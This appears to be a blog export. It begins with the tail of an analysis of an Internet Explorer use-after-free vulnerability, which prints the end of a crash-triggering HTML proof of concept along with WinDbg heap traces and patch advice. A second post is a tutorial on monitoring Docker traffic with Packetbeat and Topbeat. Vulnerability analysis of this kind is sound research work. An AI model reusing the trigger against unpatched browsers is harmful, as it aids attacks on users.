}</div>
<div style="margin-left: 36pt;">
setTimeout(“reload()”, 1000);</div>
<div style="margin-left: 36pt;">
</script></div>
<div style="margin-left: 36pt;">
<button><label><style>label{}</style><form></div>
<div style="margin-left: 36pt;">
<meter>label<optgroup><meter>fieldset<script>Trigger();</script></meter></div>
<div style="margin-left: 36pt;">
<select></select><button></button><form><form></div>
<div style="margin-left: 36pt;">
<input><script>Trigger();</script></div>
<div style="margin-left: 36pt;">
<form><style>form{-ms-behavior: url(“c”);}</style></form></div>
<div style="margin-left: 36pt;">
</html></div>
<div style="margin-left: 36pt;">
<strong>Source Code Analysis:<br />
</strong></div>
<div style="margin-left: 36pt;">
document.getElementsByTagName(“meter”).length:
First of all, it is taking the element which is specified by tag name.
Our tag name is <em>meter</em> and it is calculating the length in the for loop.</div>
<div style="margin-left: 36pt;">
document.getElementsByTagName(“meter”)[i].innerText = “a”: After that, it is the innertext property of the index of <em>meter</em> element to <em>a.</em></div>
<div style="margin-left: 36pt;">
Reload(): This function will run 1000 ms.</div>
<div style="margin-left: 36pt;">
<label><style>label{}</style><form>: Then it is creating a label within the style tag.</div>
<div style="margin-left: 36pt;">
<meter>label<optgroup><meter>fieldset<script>Trigger();</script></meter>:
This calls the meter element with Trigger function. This is some type
of memory allocation.</div>
<div style="margin-left: 36pt;">
form{-ms-behavior: url(“c”);}: This is
parsing the url which is c, but there is no url defined as c. This will
cause a memory crash. We will get more details by windbg analysis</div>
<div style="margin-left: 36pt;">
<strong>Analysis Using Windbg:<br />
</strong></div>
<div style="margin-left: 36pt;">
Before starting with Windbg, we have to set up all the symbols for windbg. Please follow the links below:</div>
<div style="margin-left: 36pt;">
<a href="https://www.osr.com/blog/2014/10/01/setting-the-windbg-symbol-search-path/">https://www.osr.com/blog/2014/10/01/setting-the-windbg-symbol-search-path/</a></div>
<div style="margin-left: 36pt;">
<a href="http://blogs.msdn.com/b/cclayton/archive/2010/02/24/how-to-setup-windbg.aspx">http://blogs.msdn.com/b/cclayton/archive/2010/02/24/how-to-setup-windbg.aspx</a></div>
<div style="margin-left: 36pt; text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122915_0332_CVE201524441.png" /><span style="font-size: 12pt;"><br />
</span></div>
<div style="margin-left: 36pt;">
With page heap enabled, if someone visits the page it will crash and we will see the following:</div>
<div style="margin-left: 36pt;">
<span style="font-family: Courier New;">(7c0.408): Access violation – code c0000005 (first chance)<br />
</span>First chance exceptions are reported before any exception handling. This exception may be expected and handled.<br />
<span style="font-family: Courier New;">*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\MSHTML.dll –<br />
eax=00000000 ebx=12698fa0 ecx=0000ffff edx=00000100 esi=00000000 edi=12696fb8<br />
eip=6fea5a44 esp=0a75ba18 ebp=0a75ba38 iopl=0 nv up ei pl zr na pe nc<br />
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />
MSHTML!CreateCoreWebView+0x1e0234:<br />
6fea5a44 81b828030000506ffb6f cmp dword ptr [eax+328h],offset MSHTML!CreateCoreWebView+0x2f1740 (6ffb6f50)<br />
ds:002b:00000328=????????</span></div>
0:011> ub<br />
MSHTML!CTreeNode::GetCascadedLang+0x5f:<br />
6fea5a2b 8945f8 mov dword ptr [ebp-8],eax<br />
6fea5a2e 8945f0 mov dword ptr [ebp-10h],eax<br />
6fea5a31 8b4710 mov eax,dword ptr [edi+10h]<br />
6fea5a34 85c0 test eax,eax<br />
6fea5a36 740a je MSHTML!CTreeNode::GetCascadedLang+0x76 (6fea5a42)<br />
6fea5a38 f6400c04 test byte ptr [eax+0Ch],4<br />
6fea5a3c 0f859a020000 jne MSHTML!CTreeNode::GetCascadedLang+0x30f (6fea5cdc)<br />
6fea5a42 8b07 mov eax,dword ptr [edi]<br />
0:011> !heap -p -a edi+10<br />
address 12696fc8 found in<br />
_DPH_HEAP_ROOT @ a961000<br />
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize – VirtAddr VirtSize)<br />
a9646e8: 12696fb8 48 – 12696000 2000<br />
71e694ec verifier!AVrfDebugPageHeapAllocate+0x0000023c<br />
779057b7 ntdll!RtlDebugAllocateHeap+0x0000003c<br />
778a77ce ntdll!RtlpAllocateHeap+0x0004665a<br />
77861134 ntdll!RtlAllocateHeap+0x0000014d<br />
6fa31dd5 MSHTML!CLabelElement::CreateElement+0x00000015<br />
6f8a5b4d MSHTML!CreateElement+0x00000084<br />
6fa14768 MSHTML!CInBodyInsertionMode::DefaultStartElementHandler+0x00000078<br />
6f91d6eb MSHTML!CInsertionMode::HandleStartElementToken+0x0000003d<br />
6f91d3a3 MSHTML!CHtml5TreeConstructor::HandleElementTokenInInsertionMode+0x00000026<br />
6f91d338 MSHTML!CHtml5TreeConstructor::PushElementToken+0x000000a5<br />
6f91d1cc MSHTML!CHtml5Tokenizer::TagName_StateHandler+0x0000028c<br />
6f91ab35 MSHTML!CHtml5Tokenizer::ParseBuffer+0x0000012c<br />
6f91ae09 MSHTML!CHtml5Parse::ParseToken+0x00000131<br />
6f91a377 MSHTML!CHtmPost::ProcessTokens+0x000006af<br />
6f914952 MSHTML!CHtmPost::Exec+0x000001e4<br />
6f991118 MSHTML!CHtmPost::Run+0x0000003d<br />
6f99107e MSHTML!PostManExecute+0x00000061<br />
6f9994a2 MSHTML!PostManResume+0x0000007b<br />
6f9b04f7 MSHTML!CDwnChan::OnMethodCall+0x0000003e<br />
6f7fd865 MSHTML!GlobalWndOnMethodCall+0x0000016d<br />
6f7fd18a MSHTML!GlobalWndProc+0x000002e5<br />
75a68e71 user32!_InternalCallWinProc+0x0000002b<br />
75a690d1 user32!UserCallWinProcCheckWow+0x0000018e<br />
75a6a66f user32!DispatchMessageWorker+0x00000208<br />
75a6a6e0 user32!DispatchMessageW+0x00000010<br />
710600d8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464<br />
7108d0d8 IEFRAME!LCIETab_ThreadProc+0x0000037b<br />
71c7d81c iertutil!_IsoThreadProc_WrapperToReleaseScope+0x0000001c<br />
70ef3991 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094<br />
755f7c04 KERNEL32!BaseThreadInitThunk+0x00000024<br />
7787ad1f ntdll!__RtlUserThreadStart+0x0000002f<br />
7787acea ntdll!_RtlUserThreadStart+0x0000001b<br />
0:011> db edi+10<br />
12696fc8 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 …………….<br />
12696fd8 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 …………….<br />
12696fe8 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 …………….<br />
12696ff8 00 00 00 00 00 00 00 00-?? ?? ?? ?? ?? ?? ?? ?? ……..????????<br />
12697008 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????<br />
12697018 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????<br />
12697028 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????<br />
12697038 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????<br />
This looks like a use-after-free on memory which was previously freed
by the ProtectedFree implementation (and zeroed-out) and thus the
memory is not yet marked as free by the heap manager. To verify this
assumption, we first disable the Memory Protect feature to see if it’s
really accessing freed memory:<br />
<span style="font-family: Courier New;">C:\>reg query “HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MEMPROTECT_MODE”<br />
</span><br />
<span style="font-family: Courier New;">HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\Feature<br />
Control\FEATURE_MEMPROTECT_MODE<br />
iexplore.exe REG_DWORD 0x0<br />
</span><br />
I<span style="color: black;">f we trigger the crash again, we notice
that this time freed memory is accessed and the memory was indeed
previously allocated by the ProtectedFree function.</span><br />
<span style="font-family: Courier New;">(12c.4a4): Access violation – code c0000005 (first chance)<br />
</span>First chance exceptions are reported before any exception handling.<br />
This exception may be expected and handled.<br />
<span style="font-family: Courier New;">eax=00000000 ebx=0e958fa0 ecx=0000ffff edx=00000100 esi=00000000 edi=0e982fb8<br />
eip=70595a31 esp=0b3cbda0 ebp=0b3cbdc0 iopl=0 nv up ei pl zr na pe nc<br />
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />
MSHTML!CTreeNode::GetCascadedLang+0x65:<br />
70595a31 8b4710 mov eax,dword ptr [edi+10h] ds:002b:0e982fc8=????????<br />
</span><br />
<span style="font-family: Courier New;">0:006> !heap -p -a edi+10<br />
address 0e982fc8 found in<br />
_DPH_HEAP_ROOT @ aa31000<br />
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)<br />
aa34f70: e982000 2000<br />
72909712 verifier!AVrfDebugPageHeapFree+0x000000c2<br />
77906061 ntdll!RtlDebugFreeHeap+0x0000003c<br />
778a69ea ntdll!RtlpFreeHeap+0x00044b2f<br />
77861eaa ntdll!RtlFreeHeap+0x000001b6<br />
<strong> 6feacbbd MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x00000122</strong><br />
701a8a95 MSHTML!CLabelElement::`vector deleting destructor’+0x00000025<br />
6fef7001 MSHTML!CBase::SubRelease+0x00000045<br />
6ff14ee2 MSHTML!CElement::PrivateExitTree+0x00000060<br />
6ff15c8a MSHTML!CMarkup::DestroySplayTree+0x000003ab<br />
6ff16b26 MSHTML!CMarkup::UnloadContents+0x00000d33<br />
70198f3c MSHTML!CMarkup::TearDownMarkupHelper+0x000000a7<br />
70198e63 MSHTML!CMarkup::TearDownMarkup+0x00000058<br />
7018af24 MSHTML!COmWindowProxy::SwitchMarkup+0x000004f3<br />
70876d6a MSHTML!COmWindowProxy::ExecRefresh+0x00000a1d<br />
70876ee3 MSHTML!COmWindowProxy::ExecRefreshCallback+0x00000023<br />
6feed865 MSHTML!GlobalWndOnMethodCall+0x0000016d<br />
6feed18a MSHTML!GlobalWndProc+0x000002e5<br />
75a68e71 user32!_InternalCallWinProc+0x0000002b<br />
75a690d1 user32!UserCallWinProcCheckWow+0x0000018e<br />
75a6a66f user32!DispatchMessageWorker+0x00000208<br />
75a6a6e0 user32!DispatchMessageW+0x00000010<br />
71a700d8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464<br />
71a9d0d8 IEFRAME!LCIETab_ThreadProc+0x0000037b<br />
7271d81c iertutil!_IsoThreadProc_WrapperToReleaseScope+0x0000001c<br />
716f3991 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094<br />
755f7c04 KERNEL32!BaseThreadInitThunk+0x00000024<br />
7787ad1f ntdll!__RtlUserThreadStart+0x0000002f<br />
7787acea ntdll!_RtlUserThreadStart+0x0000001b</span><br />
0:006> kb<br />
ChildEBP RetAddr Args to Child<br />
0b3cbdc0 7059559d 1330afc8 0b3cc1ec 00000001 MSHTML!CTreeNode::GetCascadedLang+0x65<br />
0b3cbe78 700173bf 0ab19fa0 0e615fa0 00000003 MSHTML!CStyleSheetArray::BuildListOfProbableRules+0x2d5<br />
0b3cbf3c 6fff6d3c 0b3cc1ec 00000001 00000003 MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x57<br />
0b3cc190 70284613 0b3cc1ec 00000003 00000400 MSHTML!CMarkup::ApplyStyleSheets+0xca<br />
0b3cc1c4 701a742e 0b3cc1ec 00000000 0aa41bb8 MSHTML!CElement::ApplyBehaviorCss+0x9e<br />
0b3cc46c 700adfe3 00000004 07450000 0aa41bb8 MSHTML!CElement::ProcessPeerTask+0xc1f<br />
0b3cc488 700adf3c 00000000 1375dfe8 0aa41bb8 MSHTML!CMarkup::ProcessPeerTaskContext+0x8e<br />
0b3cc4a0 700d3070 0aa41bb8 00000000 00000000 MSHTML!CMarkup::ProcessPeerTasks+0x3f<br />
0b3cc550 6ff17539 00000001 00000000 0b3cc57c MSHTML!CMarkup::UnloadContents+0x1017<br />
0b3cc574 6fef705c 0f4febb8 00000001 6feeccb0 MSHTML!CMarkup::Passivate+0x89<br />
0b3cc58c 6feecccc 0f4febb8 0f4febb8 00000001 MSHTML!CBase::PrivateRelease+0xbc<br />
0b3cc5a8 6ff040f6 0f4febb8 0b3cc5d0 6feecf70 MSHTML!CMarkup::Release+0x18<br />
0b3cc5c4 703edeb0 0f318f18 0e97cf90 00000000 MSHTML!CTxtSite::Release+0xc2<br />
0b3cc5d8 703ede77 00000000 0e97cf90 00000000 MSHTML!CImplPtrAry::ReleaseAndDelete+0x2e<br />
0b3cc5ec 70481a67 00000000 0b3cc624 0e97cf90 MSHTML!CFormElement::DetachExtraFormInputSiteByIndex+0x22<br />
0b3cc5fc 701b66e3 0e97cf90 0b3cc618 0b3cc680 MSHTML!CFormElement::DetachAllExtraFormInputSites+0x13<br />
0b3cc60c 6ff15be3 0b3cc624 0b3cc690 7019abb0 MSHTML!CFormElement::Notify+0x76<br />
0b3cc680 6ff16b26 00000001 00000001 0f2ace30 MSHTML!CMarkup::DestroySplayTree+0x2dd<br />
0b3cc730 70198f3c 00000000 00000001 0c9d4bd0 MSHTML!CMarkup::UnloadContents+0xd33<br />
0b3cc748 70198e63 00000001 00000001 0f33cbb8 MSHTML!CMarkup::TearDownMarkupHelper+0xa7<br />
0b3cc770 7018af24 00000001 00000001 0b3cc838 MSHTML!CMarkup::TearDownMarkup+0x58<br />
0b3cc818 70876d6a 0f33cbb8 00000000 00000000 MSHTML!COmWindowProxy::SwitchMarkup+0x4f3<br />
0b3cc8fc 70876ee3 00005004 ffffffff 00000000 MSHTML!COmWindowProxy::ExecRefresh+0xa1d<br />
0b3cc910 6feed865 0aeb9f68 00005004 0ba04cc8 MSHTML!COmWindowProxy::ExecRefreshCallback+0x23<br />
0b3cc95c 6feed18a 3e26b724 6feec290 00008002 MSHTML!GlobalWndOnMethodCall+0x16d<br />
0b3cc9ac 75a68e71 000103d0 00008002 00000000 MSHTML!GlobalWndProc+0x2e5<br />
0b3cc9d8 75a690d1 6feec290 000103d0 00008002 user32!_InternalCallWinProc+0x2b<br />
0b3cca6c 75a6a66f 6feec290 00000000 00008002 user32!UserCallWinProcCheckWow+0x18e<br />
0b3ccad8 75a6a6e0 30748176 0b3cfcb0 71a700d8 user32!DispatchMessageWorker+0x208<br />
0b3ccae4 71a700d8 0b3ccb24 11ce0e48 1161cfe0 user32!DispatchMessageW+0x10<br />
0b3cfcb0 71a9d0d8 0b3cfd7c 71a9cd50 11cdeff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464<br />
0b3cfd70 7271d81c 11ce0e48 0b3cfd94 71b05f70 IEFRAME!LCIETab_ThreadProc+0x37b<br />
0b3cfd88 716f3991 11cdeff0 716f3900 716f3900 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c<br />
0b3cfdc0 755f7c04 0e502fe8 755f7be0 3b839130 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94<br />
0b3cfdd4 7787ad1f 0e502fe8 3972bde9 00000000 KERNEL32!BaseThreadInitThunk+0x24<br />
0b3cfe1c 7787acea ffffffff 7786022b 00000000 ntdll!__RtlUserThreadStart+0x2f<br />
0b3cfe2c 00000000 716f3900 0e502fe8 00000000 ntdll!_RtlUserThreadStart+0x1b<br />
If we check the accessed memory location just before the JavaScript
method location.reload() is called, we can see where the memory for the
CLabelElement object was allocated.<br />
<span style="color: black;"><br />
<span style="font-family: Courier New;">0:020> !heap -p -a 0e982fc8<br />
address 0e982fc8 found in<br />
_DPH_HEAP_ROOT @ aa31000<br />
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize – VirtAddr VirtSize)<br />
aa34f70: e982fb8 48 – e982000 2000<br />
MSHTML!CLabelElement::`vftable’<br />
729094ec verifier!AVrfDebugPageHeapAllocate+0x0000023c<br />
779057b7 ntdll!RtlDebugAllocateHeap+0x0000003c<br />
778a77ce ntdll!RtlpAllocateHeap+0x0004665a<br />
77861134 ntdll!RtlAllocateHeap+0x0000014d<br />
70121dd5 MSHTML!CLabelElement::CreateElement+0x00000015<br />
6ff95b4d MSHTML!CreateElement+0x00000084<br />
70104768 MSHTML!CInBodyInsertionMode::DefaultStartElementHandler+0x00000078<br />
7000d6eb MSHTML!CInsertionMode::HandleStartElementToken+0x0000003d<br />
7000d3a3 MSHTML!CHtml5TreeConstructor::HandleElementTokenInInsertionMode+0x00000026<br />
7000d338 MSHTML!CHtml5TreeConstructor::PushElementToken+0x000000a5<br />
7000d1cc MSHTML!CHtml5Tokenizer::TagName_StateHandler+0x0000028c<br />
7000ab35 MSHTML!CHtml5Tokenizer::ParseBuffer+0x0000012c<br />
7000ae09 MSHTML!CHtml5Parse::ParseToken+0x00000131<br />
7000a377 MSHTML!CHtmPost::ProcessTokens+0x000006af<br />
70004952 MSHTML!CHtmPost::Exec+0x000001e4<br />
70081118 MSHTML!CHtmPost::Run+0x0000003d<br />
7008107e MSHTML!PostManExecute+0x00000061<br />
700894a2 MSHTML!PostManResume+0x0000007b<br />
700a04f7 MSHTML!CDwnChan::OnMethodCall+0x0000003e<br />
6feed865 MSHTML!GlobalWndOnMethodCall+0x0000016d<br />
6feed18a MSHTML!GlobalWndProc+0x000002e5<br />
75a68e71 user32!_InternalCallWinProc+0x0000002b<br />
75a690d1 user32!UserCallWinProcCheckWow+0x0000018e<br />
75a6a66f user32!DispatchMessageWorker+0x00000208<br />
75a6a6e0 user32!DispatchMessageW+0x00000010<br />
71a700d8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464<br />
71a9d0d8 IEFRAME!LCIETab_ThreadProc+0x0000037b<br />
7271d81c iertutil!_IsoThreadProc_WrapperToReleaseScope+0x0000001c<br />
716f3991 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094<br />
755f7c04 KERNEL32!BaseThreadInitThunk+0x00000024<br />
7787ad1f ntdll!__RtlUserThreadStart+0x0000002f<br />
7787acea ntdll!_RtlUserThreadStart+0x0000001b</span></span><br />
<br />
<div style="margin-left: 36pt;">
<strong>Impact:<br />
</strong></div>
<div style="margin-left: 36pt;">
If an attacker succeeds in bypassing the
Memory Protector and Isolated Heap protection mechanisms, this
vulnerability allows the execution of arbitrary code on vulnerable
installations of Microsoft Internet Explorer. User interaction is
required to exploit this vulnerability in that the targeted victim must
visit a malicious page or open a malicious file.</div>
<b> Conclusion:</b><br />
<div style="margin-left: 36pt;">
<span style="font-weight: 400;">So the
above vulnerability is already exploited in the wild. It also imparts
malware, delivered as an advertisement in the victim’s browser if said
victim is uses a vulnerable version of IE. So update your IE with the
latest patch; also, be sure to update your antivirus to defend against
this vulnerability.</span></div>
<div style="margin-left: 36pt;">
<strong>Mitigation:<br />
</strong></div>
<div style="margin-left: 36pt;">
Microsoft has already released a patch for it. Please use the patch or update your system:</div>
<a href="https://technet.microsoft.com/en-us/library/security/ms15-079.aspx"><span style="font-family: Times New Roman; font-size: 12pt;"><strong>https://technet.microsoft.com/en-us/library/security/ms15-079.aspx</strong></span></a></div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-20100633364668171592015-12-31T14:21:00.000+05:302015-12-31T14:21:23.266+05:30Deep Packet Inspection in Cloud Applications<div dir="ltr" style="text-align: left;" trbidi="on">
<h1>
Cloud-Based Applications and Protocols</h1>
In the <a href="http://opentechnation.blogspot.in/2015/12/security-vulnerabilities-in-cloud.html" target="_blank">previous</a>
article, we established that security in cloud-based applications is
important and searching for vulnerabilities in cloud applications is not
somewhat harder or different than it is in web based applications. In
this article we’ll take a somewhat different approach and take a look at
protocols the cloud-based applications use under the hood and will
apply the deep packet inspection techniques to look for malicious
traffic.<br />
Every cloud-based application is running on top of a protocol that
allows the clients to communicate with the server in a standardized way;
otherwise, the client applications wouldn’t be able to communicate with
the server at all. If we have a room full of people and everybody
speaks a different language, they won’t be able to communicate. In order
to reach a common goal, they would have to agree on a way to interact
among themselves, thus forming a standard for communication that
everybody would understand.<br />
There are many protocols that we use in our daily lives when
communicating with cloud-based applications, perhaps without even
realizing it. The most commonly used protocols are the following:<br />
<ul>
<li>HTTP</li>
<li>HTTPS</li>
<li>DNS</li>
<li>SMTP</li>
<li>Custom Protocols</li>
</ul>
In order to observe the traffic coming to and going out of the cloud applications, we’re going to use <a href="https://www.docker.com/">Docker</a>
for building, shipping and running dockerized applications. Docker is
gaining in popularity and continues to be the most used container
platform, which is also being used by cloud-service providers to deploy
applications to the cloud; one such example is AWS, which is able to
directly run Docker applications.<br />
In order to analyze traffic coming to and going from Docker applications, we have to look at <a href="https://www.elastic.co/products/beats/packetbeat">Packetbeat</a>, which ships the traffic to Elasticsearch, which further enables the analysis and visualization of real-time traffic in Kibana.<br />
<h1>
Introduction to Packetbeat</h1>
We’ll assume that we already have Docker installed and ready to use,
since it’s fairly easy to do so. You can check whether Docker is
installed by issuing the following command:<br />
<span style="font-family: Courier New;"># docker –version<br />
Docker version 1.7.1, build df2f73d-dirty<br />
</span><br />
After ensuring the Docker is installed, we can install Packetbeat, which requires only <strong>libpcap</strong>,
a system-independent library for network traffic capture, enabling us
to capture packets as they arrive on a network interface.<br />
We can install Packetbeat fairly easily by pulling the Docker image from the official Docker Hub.<br />
<span style="font-family: Courier New;"># docker pull proteansec/packetbeat<br />
</span><br />
Then we have to create the packetbeat.yml configuration file, which
must include the following categories, each containing specific
information to configure Packetbeat:<strong><br />
</strong><br />
<ul>
<li><strong>Interfaces</strong>: This specifies the interface on which we would like to capture the traffic. We can use <strong>any</strong> to specify that we would like to capture traffic on all connected interfaces.<strong><br />
</strong></li>
<li><strong>Protocols</strong>: We can monitor only a limited number of
protocols for now, including DNS, HTTP, Memcache, Mysql, Postgresql,
Redis, Thrift, and MongoDB. For each protocol, we must specify on which
port the application using it is running.<strong><br />
</strong></li>
<li><strong>Output</strong>: specifies where the analyzed traffic
information will be stored, which currently supports Elasticsearch,
LogStash and in a File. In most cases, we want to use the Elasticsearch
output because it allows us to easily search through the analyzed data
as well as present it in a nice-looking graph with Kibana.</li>
</ul>
A complete packetbeat.yml configuration file can be seen below, where
we’ve made the assumption that Elasticsearch is accessible on the local
host on port 9200. You can save packetbeat.yml anywhere on the
filesystem, but it’s advisable that you create the /etc/packetbeat/
directory and put the configuration file in there; this is already being
done by the container itself.<br />
<span style="font-family: Courier New;">interfaces:<br />
device: docker0<br />
protocols:<br />
dns:<br />
ports: [53]<br />
include_authorities: true<br />
include_additionals: true<br />
http:<br />
ports: [80, 8080, 8000, 5000, 8002]<br />
memcache:<br />
ports: [11211]<br />
mysql:<br />
ports: [3306]<br />
pgsql:<br />
ports: [5432]<br />
redis:<br />
ports: [6379]<br />
thrift:<br />
ports: [9090]<br />
mongodb:<br />
ports: [27017]<br />
output:<br />
elasticsearch:<br />
enabled: true<br />
hosts: [“localhost:9200”]<br />
shipper:<br />
geoip:<br />
paths: [“/usr/local/share/GeoIP/GeoIP.dat.gz”]</span><br />
Afterwards we can start the container with the following command,
which starts the packet container by giving it access to host’s network
interfaces, services, etc. Below we’ve started the container, and then
we use the <strong>docker exec</strong> command to obtain command-line access to the running container, after which we verify that the host’s Elasticsearch port 9200<strong><br />
</strong>is actually accessible in the container itself.<br />
<span style="font-family: Courier New;"># docker run -d –net=host proteansec/packetbeat<br />
# docker exec -it $(docker ps -l -q) /bin/bash<br />
root@container:/# sudo -i<br />
root@container:/# netstat -luntp<br />
Active Internet connections (only servers)<br />
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name<br />
tcp6 0 0 :::9200 :::* LISTEN –<br />
</span><br />
To manually build the Packetbeat, we can use the following <a href="https://github.com/proteansec/packetbeat">Dockerfile</a>,
which provides many configuration parameters that enable us to change
how we run Packetbeat inside the container. Therefore, the Packetbeat
container can be up and running with the one simple command shown below.
Note that the Packetbeat is configured through the use of input
parameters we supply when running docker, but additionally GeoIP
database is downloaded and Kibana dashboards are automatically
downloaded and applied to Kibana, so we can instantly view the graphs
and analyze the traffic without much further ado.<br />
<span style="font-family: Courier New;"># docker run –name packetbeat -d –net=host -d proteansec/packetbeat app:start<br />
</span><br />
Note that Packetbeat container needs access to the host network, so
we need to apply the “–net=host” option when running the container,
which enables the container to access the interface on the host, thus
making it possible to sniff the traffic coming and going to every
dockerized application running on the same host.<br />
<h1>
Topbeat</h1>
Besides Packetbeat, there is also Topbeat, which, rather than
analyzing the traffic coming and going to dockerized applications,
rather collects and presents statistics about the other parts of the
environment, mainly the CPU, memory and disk usage.<br />
<ul>
<li>System load</li>
<li>Disk usage</li>
<li>Process status</li>
<li>Memory usage</li>
<li>CPU usage</li>
</ul>
We can get Topbeat by running the following command, which will
download the already built image from Dockerhub, but you can also
download the <a href="https://github.com/proteansec/topbeat">Dockerfile</a> manually and build the image yourselves.<br />
<span style="font-family: Courier New;"># docker run –name topbeat -d –privileged -d proteansec/topbeat app:start<br />
</span><br />
Note that Topbeat needs to be running in privileged mode, because it
need to be able to access system information from a container, which is
only possible when the container itself is run with enough privileges.<br />
After the Topbeat container has been run, we can access the Kibana
interface, which will contain a new Topbeat index pattern as presented
below:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI1.png" /></div>
Back in the Discover tab, we can see the Topbeat entries, as shown below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI2.png" /></div>
A nicer presentation of gathered data is available through the Topbeat dashboard, which can be seen below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI3.png" /></div>
<h1>
The Docker0 Network Interface</h1>
In the previous section, we specified <strong>docker0</strong>
network interface in the [interfaces] section of the packetbeat.conf
configuration file. Note that, at the time of this writing, we can only
choose a single interface with each Packetbeat instance, so if we would
like to monitor multiple network interfaces at the same time, we have to
instantiate new Packetbeat instances, each of which is sniffing network
traffic on a single network interface and sending it to Elasticsearch.
Note that we can specify <strong>any</strong> as the network interface,
which will sniff the traffic on all interfaces, but that is often not
what we want to achieve; also, it is currently not supported on all
operating system, so it doesn’t work on <a href="https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-getting-started.html">OS X</a> for example.<br />
Nevertheless, we can specify <strong>docker0</strong> network interface, which will allow us to sniff the network traffic from all container <strong>veth*</strong>
network interfaces, which is exactly what we want to achieve. It’s
often the case that we want to sniff the network traffic of every
running container in order to analyze the traffic going to services
running in the containers.<br />
When Docker starts, it creates a virtual interface <strong>docker0</strong>
and assigns it a private random IP address range, which is often set to
172.17.42/16 if available. Note the netmask is 16-bit, which means
there are 65534 available IP addresses that can be assigned to any
running containers [1].<br />
The docker0 is a network bridge, which itself contains the other
veth* network interfaces of running Docker containers. Because of this,
the containers can communicate with the host as well as with each other
in order for one service to talk to the other running in a different
container. Note that all interfaces belonging to the same bridge are in
the same collision domain, so when one interface broadcasts a request,
it is sent over the bridge to every other network interface, any of
which may respond with a packer response.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI4.png" /></div>
When Docker configures another container, it creates a new virtual interface with the unique name <strong>veth*</strong>, which is bound to the docker0 network interface on the host. Inside the docker container, the interface is renamed to <strong>eth0</strong>,
which is then given a unique IP address from the bridge’s range of
available network addresses. Below we’ll see that we need to give
Packetbeat Docker container, the –net option, which accepts the
following values:<strong><br />
</strong><br />
<ul>
<li><strong>none</strong>: The docker container will have its own
unconfigured network stack, which allows us to build our own network
inside the container.<strong><br />
</strong></li>
<li><strong>container:name/id: </strong>The docker container will share
the network stack with another container identified with NAME/ID, where
the containers will be able to talk to each other though loopback
interface.<strong><br />
</strong></li>
<li><strong>bridge</strong>: This option is the default and connects the container interface to the Docker bridge as already described.<strong><br />
</strong></li>
<li><strong>host</strong>: The container will share the network with the
Docker host and will have access to all its network interfaces. By
using this option, the container will not be able to reconfigure the
host’s interfaces, which would require the privilege mode to be given to
the container by using “–privileged=true” option.</li>
</ul>
The docker0 interface on the host is used as the default gateway by
which the containers are able to reach the Internet. Therefore, by
configuring Packetbeat to listen on the docker0 network interface, we’re
successfully telling it to sniff every network packet coming from the
Internet to any Docker container, which is exactly what we want to
achieve.<br />
<h1>
Monitoring a HTTP application running in Docker</h1>
Now that we have Packetbeat up and running, we have to provide a
service for Packetbeat to monitor by sniffing traffic from docker0
bridge. In our case we’ll provide a static website, which is a great
example for testing the Packetbeat capabilities.<br />
Let’s first create the /home/core/website and copy some static
website content into that directory. After that, we should run the <strong>nginx</strong>
container mounting the static website content into the Nginx html
directory, which can be done with the -v option. Note that we’ve also
exposed the container port, so we can access the website running in that
container on HTTP port 80.<br />
<span style="font-family: Courier New;"># docker run -p 80:80 -v /home/core/website:/usr/share/nginx/html:ro -d nginx<br />
</span><br />
Afterward, we should connect to the Nginx container, where our website application is running. We can see that <a href="https://www.proteansec.com/">Protean Security</a> website is running in the container as can be seen on the picture below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI5.png" /></div>
In order to get details about the Packetbeat data in Elasticsearch,
we can issue the following command, which will present a pretty printed
information Packetbeat has gathered so far:<br />
